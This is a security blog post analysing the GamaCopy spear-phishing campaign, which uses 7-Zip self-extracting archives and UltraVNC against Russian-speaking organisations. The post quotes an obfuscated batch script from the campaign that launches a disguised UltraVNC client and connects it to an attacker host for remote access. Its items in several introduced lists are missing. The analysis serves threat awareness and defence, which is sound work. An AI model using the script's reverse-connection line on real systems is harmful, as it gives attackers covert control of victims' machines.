Hoplon InfoSec
27 Jan, 2025
Cybersecurity researchers have uncovered a sophisticated malware campaign that infiltrates Russian-speaking organizations using 7-Zip self-extracting archives and the UltraVNC remote access tool. This campaign, attributed to a threat actor called GamaCopy, mimics the tactics previously associated with the Kremlin-aligned Gamaredon group, highlighting its advanced and targeted nature.
In this blog, we’ll delve into the attack chain, analyze the infrastructure the threat actors use, and discuss protective measures organizations can take to mitigate this threat.
The GamaCopy malware campaign begins with a carefully designed spear-phishing attack, an approach commonly used to target specific individuals or entities. The spear-phishing email contains a malicious self-extracting (SFX) archive created with 7-Zip. This archive serves as the initial payload and is designed to bypass standard security measures, ensuring the subsequent delivery of the malware’s core components.
Once the victim executes the SFX archive, it unpacks a batch script that performs several critical actions:
The attackers successfully infiltrate the targeted system by employing these steps while maintaining a covert presence.
The batch script used in the campaign employs various obfuscation techniques to hide its intentions and hinder analysis. Below is an example of the script:
@echo off
set local enabledelayedexpansion
set qH09C99079b99D4900=%COMPUTERNAME%
set db53P23A03h83Z23e6=4797
set rM91V31H31q51V41E3=Ultr
set NX96b26L46A16Y66r6=aVNC
start "" %TEMP%\OneDrivers.exe -autoreconnect -id:%COMPUTERNAME%_SVOD_4797 -connect fmsru.ru:443
The tactics employed by GamaCopy closely resemble those of the Gamaredon group (also known as Core Werewolf, Awaken Likho, and PseudoGamaredon). These similarities include:
These overlapping tactics suggest that GamaCopy has either drawn inspiration from Gamaredon or is a direct offshoot of the group.
The GamaCopy campaign poses a significant threat to Russian-speaking organizations, particularly those in the defense, government, and critical infrastructure sectors. Using military-themed decoy documents indicates a focus on espionage and data exfiltration, aiming to gather sensitive information that could be used for strategic purposes.
Additionally, the sophistication of the campaign, combined with the use of legitimate tools like UltraVNC, makes it challenging to detect and mitigate.
Organizations should adopt a multi-layered cybersecurity approach to protect against the GamaCopy malware campaign and similar threats. Below are some key measures to consider:
The GamaCopy malware campaign underscores the evolving nature of cyber threats and the importance of proactive defense measures. By leveraging spear-phishing emails, obfuscated scripts, and legitimate remote access tools, the threat actors behind GamaCopy have demonstrated their ability to bypass traditional security measures and target high-value organizations.
Organizations, particularly those in sensitive sectors, must remain vigilant and adopt comprehensive cybersecurity practices to mitigate the risks of advanced threat campaigns. By combining robust technology with employee awareness, businesses can strengthen their defenses and minimize the impact of sophisticated attacks like GamaCopy.
For more:
https://cybersecuritynews.com/new-malware-campaign-using-7z-ultravnc-tool/
Share this :